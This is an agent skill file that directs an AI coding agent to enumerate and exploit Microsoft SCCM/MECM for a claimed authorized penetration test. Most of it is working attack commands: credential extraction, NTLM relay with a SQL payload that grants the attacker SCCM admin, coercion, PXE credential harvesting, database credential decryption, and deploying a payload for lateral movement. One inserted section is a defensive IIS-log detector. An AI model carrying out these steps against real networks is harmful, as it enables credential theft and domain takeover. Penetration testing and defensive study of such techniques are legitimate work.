Agent skill

sccm-exploitation

Enumerates and exploits Microsoft SCCM/MECM (System Center Configuration Manager / Microsoft Endpoint Configuration Manager) infrastructure for credential harvesting, lateral movement, and domain escalation. Covers SCCM enumeration (sccmhunter, SharpSCCM), Network Access Account (NAA) credential extraction (policy request, WMI DPAPI, WMI repository), management point NTLM relay to MSSQL (TAKEOVER1), client push relay (ELEVATE2), PXE boot media credential harvesting (CRED1), SCCM database credential extraction, application deployment for lateral movement, and SCCM share looting.

npx add-skill https://github.com/blacklanternsecurity/red-run/tree/main/skills/ad/sccm-exploitation

SKILL.md

SCCM/MECM Exploitation

You are helping a penetration tester enumerate and exploit Microsoft SCCM/MECM infrastructure for credential harvesting, lateral movement, and domain escalation. All testing is under explicit written authorization.

Engagement Logging

Check for a ./engagement/ directory. If it is absent, proceed without logging.

When an engagement directory exists:

  • Print [sccm-exploitation] Activated → <target> to the screen on activation.
  • Evidence → save significant output to engagement/evidence/ with descriptive filenames (e.g., sqli-users-dump.txt, ssrf-aws-creds.json).

State Management

Call get_state_summary() from the state MCP server to read current engagement state. Use it to:

  • Skip re-testing targets, parameters, or vulns already confirmed
  • Leverage existing credentials or access for this technique
  • Understand what's been tried and failed (check Blocked section)

Your return summary must include:

  • New targets/hosts discovered (with ports and services)
  • New credentials or tokens found
  • Access gained or changed (user, privilege level, method)
  • Vulnerabilities confirmed (with status and severity)
  • Pivot paths identified (what leads where)
  • Blocked items (what failed and why, whether retryable)

Prerequisites

Access required: Domain user (for enumeration and NAA extraction via policy request). Local admin on SCCM client (for WMI/DPAPI extraction). Domain admin or relay position (for MP relay and database attacks).

Kerberos authentication setup (for enumeration):

```bash
getTGT.py 'DOMAIN.LOCAL/username:password' -dc-ip DC_IP
export KRB5CCNAME=$(pwd)/username.ccache
```

Tools: sccmhunter, SharpSCCM, MalSCCM, ntlmrelayx.py, PetitPotam, pxethiefy/PXEThief/SharpPXE, CMLoot, Mimikatz, SQLRecon.

Privileged Commands

Claude Code cannot execute sudo commands. The following require root and must be handed off to the user:

  • pxethiefy.py — PXE boot credential harvesting (needs raw sockets for DHCP/TFTP)
  • ntlmrelayx.py — NTLM relay to SCCM management point MSSQL (needs raw sockets)

Handoff protocol: Present the full command including sudo, ask the user to run it, then read the output or wait for callback confirmation.

Non-privileged commands Claude can execute directly:

  • Enumeration: sccmhunter, SharpSCCM, CMLoot
  • Policy extraction: sccmhunter http, sccmhunter show
  • Post-exploitation: SQLRecon, MalSCCM, Mimikatz
  • Coercion triggers: PetitPotam.py

Step 1: Enumerate SCCM Infrastructure

Discovery via sccmhunter

```bash
# Find SCCM infrastructure in the domain
sccmhunter.py find -u 'user' -p 'Password123' -d DOMAIN.LOCAL -dc-ip DC_IP

# Display discovered site servers
sccmhunter.py show -siteservers

# HTTP-based enumeration (no WMI, broader info)
sccmhunter.py http -u 'user' -p 'Password123' -d DOMAIN.LOCAL -dc-ip DC_IP -auto
```

SharpSCCM (from compromised Windows host)

```powershell
# Enumerate devices managed by site server
.\SharpSCCM.exe get devices --server SCCM01 --site-code P01
```

Unauthenticated MP Endpoints

```bash
# Retrieve site signing cert + Unknown Computer GUIDs
curl -s http://MP01.domain.local/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA | xmllint --format -

# List all management points
curl -s http://MP01.domain.local/SMS_MP/.sms_aut?MPLIST | xmllint --format -

# Get site signing certificate
curl -s http://MP01.domain.local/SMS_MP/.sms_aut?SITESIGNCERT | xmllint --format -
```

These HTTP endpoints are unauthenticated and reveal site structure.
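From the defender's side, each of those requests lands in the IIS logs of the management point, which is the detection source the OPSEC Comparison at the end of this skill lists for MP endpoint queries. The following is an added detection example, not code from the skill or from sccmhunter: it parses IIS W3C extended logs using the `#Fields:` header and flags any source that touches two or more of the three enumerable `.sms_aut` queries, or that presents a generic tooling user agent. The log lines are constructed, the field layout follows the IIS default W3C set, and the user-agent prefixes and the `SMS CCM 5.0` client agent string are assumptions to adjust for your environment.

```python
"""Flag enumeration of the unauthenticated SCCM management point endpoints
in IIS W3C logs.

Added detection example (not part of the original skill). The sample log is
constructed; the field order follows the IIS default W3C extended format and
is read from the #Fields: header, so other layouts parse as well.
"""
from collections import defaultdict

# The three .sms_aut query strings that answer without authentication.
# One source touching two or more of them in a short window is enumeration
# behaviour rather than a normal client session.
ENUM_QUERIES = {"MPKEYINFORMATIONMEDIA", "MPLIST", "SITESIGNCERT"}
MP_PATH = "/sms_mp/.sms_aut"

# User-agent prefixes of manual tooling (assumption: the SCCM client itself
# never presents these; it identifies as "SMS CCM 5.0", space encoded as '+').
TOOL_UA_PREFIXES = ("curl/", "python-requests/", "Wget/")

# Constructed sample: one scripted sweep from 10.0.9.77 and one legitimate
# client on 10.0.20.31 that happens to request MPLIST.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-05-01 09:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-05-01 09:00:01 10.0.0.5 GET /SMS_MP/.sms_aut MPKEYINFORMATIONMEDIA 80 - 10.0.9.77 curl/8.5.0 - 200 0 0 15
2024-05-01 09:00:02 10.0.0.5 GET /SMS_MP/.sms_aut MPLIST 80 - 10.0.9.77 curl/8.5.0 - 200 0 0 12
2024-05-01 09:00:03 10.0.0.5 GET /SMS_MP/.sms_aut SITESIGNCERT 80 - 10.0.9.77 curl/8.5.0 - 200 0 0 9
2024-05-01 09:00:10 10.0.0.5 GET /SMS_MP/.sms_aut MPLIST 80 - 10.0.20.31 SMS+CCM+5.0 - 200 0 0 4
2024-05-01 09:00:11 10.0.0.5 CCM_POST /ccm_system/request - 80 - 10.0.20.31 SMS+CCM+5.0 - 200 0 0 31
"""


def parse_w3c(text):
    """Yield one dict per log entry, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
            continue
        if line.startswith("#") or fields is None:
            continue  # other directives, or data before any header
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed line: skip rather than misalign columns
        yield dict(zip(fields, values))


def find_mp_enumeration(text):
    """Return {client_ip: {"queries", "user_agents", "hits"}} for sources
    that hit two or more enumeration endpoints or used a tooling user agent."""
    per_source = defaultdict(lambda: {"queries": set(), "user_agents": set(), "hits": 0})
    for entry in parse_w3c(text):
        if entry.get("cs-uri-stem", "").lower() != MP_PATH:
            continue
        query = entry.get("cs-uri-query", "-").upper()
        if query not in ENUM_QUERIES:
            continue
        src = per_source[entry["c-ip"]]
        src["queries"].add(query)
        src["user_agents"].add(entry.get("cs(User-Agent)", "-"))
        src["hits"] += 1

    flagged = {}
    for ip, info in per_source.items():
        tooling = any(ua.startswith(TOOL_UA_PREFIXES) for ua in info["user_agents"])
        if len(info["queries"]) >= 2 or tooling:
            flagged[ip] = info
    return flagged


if __name__ == "__main__":
    for ip, info in find_mp_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {info['hits']} hits, queries={sorted(info['queries'])}, "
              f"agents={sorted(info['user_agents'])}")
```

Run it against a real `u_ex*.log` by reading the file into `find_mp_enumeration`. Hits from the site's own servers and from known OSD/PXE ranges will show up as well, so suppress those sources explicitly rather than loosening the two-endpoint threshold; a single MPLIST from a client is normal, a sweep of all three from one workstation is not.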

Attack Path Decision Tree

```
SCCM Infrastructure Found
├── Have local admin on SCCM client? → Step 3 (NAA from WMI/DPAPI — quietest)
├── Can create machine account? → Step 2 (NAA via policy request)
├── Can reach MP + MSSQL? → Step 4 (MP relay to MSSQL)
├── Auto client push enabled? → Step 5 (Client push relay)
├── PXE-enabled DP? → Step 6 (PXE boot credential harvesting)
├── Have SCCM admin or DB access? → Step 7 (Database credential extraction)
└── Have SCCM admin? → Step 8 (Application deployment for lateral movement)
```

Step 2: NAA Extraction via Policy Request (CRED-2)

Extract Network Access Account credentials by requesting machine policy from the management point. Requires a machine account (real or created).

Create Machine Account + Request Policy

```bash
# 1. Create a machine account (MAQ default allows this)
addcomputer.py -computer-name 'fakesccm$' -computer-pass 'Password123!' \
  'DOMAIN.LOCAL/user:pass' -dc-ip DC_IP

# 2. Add DNS entry for SCCM server (if not resolving)
echo "SCCM_IP  SCCM01 SCCM01.DOMAIN.LOCAL" >> /etc/hosts

# 3. Request policy from MP using fake computer identity (sccmwtf)
python3 sccmwtf.py fake fakepc.domain.local SCCM01 'DOMAIN\fakesccm$' 'Password123!'

# 4. Extract and decrypt NAA credentials from policy XML
cat /tmp/naapolicy.xml | grep 'NetworkAccessUsername\|NetworkAccessPassword' -A 5 \
  | grep 'CDATA' | cut -d '[' -f 3 | cut -d ']' -f 1 \
  | xargs -I {} python3 policysecretunobfuscate.py {}
```

SharpSCCM Alternative

```powershell
# From a compromised host (creates new device registration)
.\SharpSCCM.exe get naa -r newdevice -u fakesccm$ -p 'Password123!'
.\SharpSCCM.exe get secrets -u fakesccm$ -p 'Password123!'
```

Recovered secrets: NetworkAccessUsername, NetworkAccessPassword — typically a domain account used for SCCM client network access during OSD.

Step 3: NAA Extraction from Running Client (CRED-3 / CRED-4)

Extract NAA credentials from a compromised SCCM client's local WMI store. Requires local administrator on the SCCM client.

WMI Query + DPAPI Decryption (CRED-3)

```powershell
# Query NAA from WMI (DPAPI-encrypted blobs)
Get-WmiObject -Namespace "root\ccm\policy\Machine\ActualConfig" -Class "CCM_NetworkAccessAccount"
# Output: NetworkAccessPassword = <![CDATA[E600000001...]]>

# Decrypt with SharpSCCM (automated)
.\SharpSCCM.exe local secrets -m wmi

# Decrypt with SharpDPAPI (manual)
$str = "060...F2DAF"  # Hex from WMI output
$bytes = for($i=0; $i -lt $str.Length; $i++) {
  [byte]::Parse($str.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber); $i++
}
$b64 = [Convert]::ToBase64String($bytes[4..$bytes.Length])
.\SharpDPAPI.exe blob /target:$b64 /mkfile:masterkeys.txt
```

WMI Repository Search (CRED-4 — Legacy)

```powershell
# Search WMI repository file for encrypted secrets
.\SharpDPAPI.exe search /type:file /path:C:\Windows\System32\wbem\Repository\OBJECTS.DATA

# SharpSCCM automated disk search
.\SharpSCCM.exe local secrets -m disk
```

sccmhunter HTTP Method (Remote)

```bash
# Remote NAA extraction via HTTP (if accessible)
sccmhunter.py http -u 'admin' -p 'Password' -d DOMAIN.LOCAL -dc-ip DC_IP -auto
```

Step 4: Management Point Relay to MSSQL (TAKEOVER-1)

Relay the management point's NTLM authentication to the SCCM database to gain sysadmin access and extract OSD policy secrets.

Prerequisites: Network access to MP and MSSQL, ability to coerce MP authentication (PetitPotam/PrinterBug/DFSCoerce).

Start Relay Listener

```bash
# SOCKS proxy mode (for interactive SQL follow-on)
ntlmrelayx.py -ts -t mssql://MSSQL_IP -socks -smb2support

# Direct SQL execution — add yourself as SCCM admin
ntlmrelayx.py -smb2support -ts -t mssql://MSSQL_IP -q "USE CM_P01; \
  INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) \
  VALUES (0x<YOUR_SID_HEX>,'DOMAIN\\your_user',0,0,'','','','','P01'); \
  INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) \
  VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'DOMAIN\\your_user'),'SMS0001R','SMS00ALL','29'); \
  INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) \
  VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'DOMAIN\\your_user'),'SMS0001R','SMS00001','1'); \
  INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) \
  VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'DOMAIN\\your_user'),'SMS0001R','SMS00004','1');"
```

Coerce MP Authentication

```bash
# PetitPotam to coerce MP to authenticate to relay listener
python3 PetitPotam.py RELAY_LISTENER_IP MP_IP -u user -p pass -d DOMAIN -dc-ip DC_IP
```

Extract OSD Secrets via SOCKS Proxy

```bash
# Connect to MSSQL through relay SOCKS proxy
proxychains mssqlclient.py -windows-auth 'DOMAIN/MP01$'@MSSQL_IP
```

```sql
-- Get Unknown Computer GUIDs
USE CM_P01;
SELECT SMS_Unique_Identifier0 FROM dbo.UnknownSystem_DISC WHERE DiscArchKey = 2;

-- List policies assigned to Unknown Computer
EXEC MP_GetMachinePolicyAssignments N'<GUID>', N'';

-- Retrieve full policy body
EXEC MP_GetPolicyBody N'{POLICY_ID}', N'2.00';
```

Decrypt Policy Blob

```bash
# Convert hex policy to XML
echo 'fffe3c003f0078...' | xxd -r -p > policy.xml

# Decrypt embedded credential values with PXEthief
python3 pxethief.py 7 $(xmlstarlet sel -t -v "//value/text()" policy.xml)
```

Recovers: OSDJoinAccount/Password, NetworkAccessUsername/Password, and other task sequence variable credentials.

sccmhunter Automated MSSQL Path

```bash
# Automated SQL execution for RBAC admin + privilege escalation
sccmhunter.py mssql -u user -p pass -d DOMAIN.LOCAL -dc-ip DC_IP \
  -tu your_user -sc P01 -stacked
```

Step 5: Client Push Account Relay (ELEVATE-2)

If automatic site-wide client push is enabled, trigger the SCCM site server to authenticate as the client push account and relay it.

```bash
# 1. Start relay targeting MSSQL (or SMB/LDAP)
ntlmrelayx.py -t mssql://MSSQL_IP -smb2support

# 2. Trigger client push to your IP
.\SharpSCCM.exe invoke client-push -t ATTACKER_IP
```

SCCM site server authenticates as the client push installation account to your IP — relay to MSSQL for sysadmin or to LDAP for RBCD/machine account creation.

Conditions: Automatic site-wide client push enabled + automatic device approval + NTLM fallback allowed.

Step 6: PXE Boot Credential Harvesting (CRED-1)

Extract credentials from PXE-enabled Distribution Points.

pxethiefy (Linux)

```bash
# Listen for PXE responses and extract boot variables
sudo python3 pxethiefy.py explore -i eth0
# Extracts variables.dat, decrypts or outputs Hashcat hash
```

SharpPXE (Windows)

```powershell
# Send PXE boot request, download variables.dat via TFTP
.\SharpPXE.exe
# If password-protected: outputs $sccm$aes128$... for Hashcat
```

Manual TFTP Download

```bash
# TFTP is unauthenticated on PXE-enabled DPs
tftp MP01.domain.local
tftp> get SMSBoot\\x64\\pxe\\variables.dat

# If password-protected: save hash to evidence for cracking
# Hash format: $sccm$aes128$... (hashcat mode 31100)
cp hash.txt engagement/evidence/sccm-pxe-hash.txt
```

Do NOT crack hashes in this skill. Save the PXE hash to engagement/evidence/ and return to the orchestrator with the hash file path, hash type (SCCM PXE / hashcat mode 31100), and a routing recommendation to credential-recovery.

Recovered: Management Point URL, site code, media GUIDs, potentially task sequence credentials.

Step 7: Database Credential Extraction (CRED-5)

Extract all encrypted credentials from the SCCM database's SC_UserAccount table. Requires sysadmin access to the database (via relay or direct).

Mimikatz (Direct SCCM Decryption)

```powershell
# Queries SC_UserAccount + decrypts all credentials
mimikatz # misc::sccm /connectionstring:"DRIVER={SQL Server};Trusted=true;DATABASE=CM_P01;SERVER=MSSQL01;"
```

SQLRecon

```powershell
# On site server where DB is local
.\SQLRecon.exe /auth:WinToken /host:MSSQL01 /database:CM_P01 /module:sDecryptCredentials

# Manual extraction
.\SQLRecon.exe /auth:WinToken /host:MSSQL01 /database:CM_P01 /module:query /command:"SELECT * FROM SC_UserAccount"
```

Manual Decryption

```bash
# Decrypt extracted values with xpn's PoC
sccmdecryptpoc.exe 0C010000080...5D6F0
```

Step 8: Application Deployment for Lateral Movement

Deploy malicious applications to device collections for code execution on target machines. Requires SCCM admin access.

MalSCCM (Full Chain)

```powershell
# 1. Enumerate targets
MalSCCM.exe locate
MalSCCM.exe inspect /computers

# 2. Create device collection
MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device

# 3. Add target hosts
MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET01

# 4. Create application (UNC path to payload on SCCMContentLib$)
MalSCCM.exe app /create /name:update /uncpath:"\\\\SCCM01\\SCCMContentLib$\\payload.exe"

# 5. Deploy to group
MalSCCM.exe app /deploy /name:update /groupname:TargetGroup /assignmentname:deploy01

# 6. Force immediate checkin
MalSCCM.exe checkin /groupname:TargetGroup

# 7. Cleanup
MalSCCM.exe app /cleanup /name:update
MalSCCM.exe group /delete /groupname:TargetGroup
```

SharpSCCM (Simpler Execution)

```powershell
# Direct command execution on device
.\SharpSCCM.exe exec -d TARGET01 -p "C:\Windows\System32\cmd.exe /c whoami > C:\temp\out.txt" -s
```

SCCM Share Looting (CMLoot)

```powershell
# Inventory all files on SCCM shares
Invoke-CMLootInventory -SCCMHost SCCM01.domain.local -Outfile sccmfiles.txt

# Download interesting files
Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi
Invoke-CMLootDownload -SingleFile '\\SCCM01\SCCMContentLib$\DataLib\SC100001.1\x86\config.xml'
```

SCCMContentLib$ is world-readable and may contain application binaries, task sequence XML with embedded credentials, and configuration files.

Step 9: Escalate or Pivot

STOP and return to the orchestrator with:

  • What was achieved (RCE, creds, file read, etc.)
  • New credentials, access, or pivot paths discovered
  • Context for next steps (platform, access method, working payloads)

Troubleshooting

sccmhunter find Returns Nothing

  • Verify LDAP connectivity: nxc ldap DC_IP -u user -p pass
  • SCCM objects may be in a different naming context — try manual LDAP search for mSSMSSite objectClass
  • Site server may not be registered in AD (standalone) — scan network for port 80/443 on servers and check /SMS_MP/ endpoint

Policy Request Fails (NAA Extraction)

  • Management point may require PKI client certificate — check MP configuration for "HTTPS only" mode
  • Machine account may not be registered — use SharpSCCM to register a new device identity
  • DNS must resolve the MP hostname — add /etc/hosts entry

Relay to MSSQL Fails

  • SMB signing may be required on MSSQL host — check with nxc smb MSSQL_IP for signing status
  • MSSQL may not accept relay — Extended Protection for Authentication (EPA) blocks relay on modern SQL Server
  • Verify MP is sysadmin on DB — try SOCKS proxy after relay to confirm

PXE Boot Extraction Fails

  • PXE must be enabled on Distribution Point — check registry HKLM\Software\Microsoft\SMS\DP\PxeInstalled
  • Need network reachability on UDP 4011 (DHCP proxy) and UDP 69 (TFTP)
  • If password-protected: extract hash and route to credential-recovery (mode 31100)

Application Deployment Not Executing

  • Default GPUpdate interval is 90 minutes — use MalSCCM.exe checkin or gpupdate /force on target
  • Verify device is in the collection: MalSCCM.exe inspect /groups
  • Check SCCM client logs on target: C:\Windows\CCM\Logs\

KRB_AP_ERR_SKEW (Clock Skew)

Kerberos requires clocks within 5 minutes of the DC. This is a Clock Skew Interrupt — stop immediately and return to the orchestrator. Do not retry or fall back to NTLM. The fix requires root:

```bash
sudo ntpdate DC_IP
# or
sudo rdate -n DC_IP
```

OPSEC Comparison

| Technique | OPSEC | Detection | Prerequisites |
|---|---|---|---|
| SCCM enumeration (sccmhunter find) | Low-Medium | LDAP queries | Domain user |
| MP HTTP endpoint queries | Low | IIS logs | Network access |
| NAA from WMI (CRED-3) | Low | Local execution | Local admin on client |
| NAA from WMI repository (CRED-4) | Low | File access | Local admin on client |
| NAA via policy request (CRED-2) | Medium-High | Machine account creation + MP logs | Domain user |
| SCCM share looting (CMLoot) | Low | SMB access logs | Domain user |
| PXE boot harvesting (CRED-1) | Medium | DHCP/TFTP logs on DP | Network access |
| MP relay to MSSQL (TAKEOVER-1) | High | Coercion + relay + SQL audit | Network position |
| Client push relay (ELEVATE-2) | High | Server logs + auth events | Client push enabled |
| Database extraction (CRED-5) | High | SQL audit logs | DB sysadmin |
| Application deployment | High | Extensive SCCM + client logs | SCCM admin |
